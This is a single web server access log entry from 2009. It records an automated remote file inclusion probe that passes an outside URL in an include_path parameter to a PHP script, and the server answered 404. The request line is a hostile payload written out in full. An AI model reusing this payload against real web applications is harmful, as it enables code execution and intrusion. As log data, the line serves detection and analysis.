91.52.190.23 - - [12/Mar/2009:22:39:58 -0500] "GET /logs//includes/user_confirmation.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
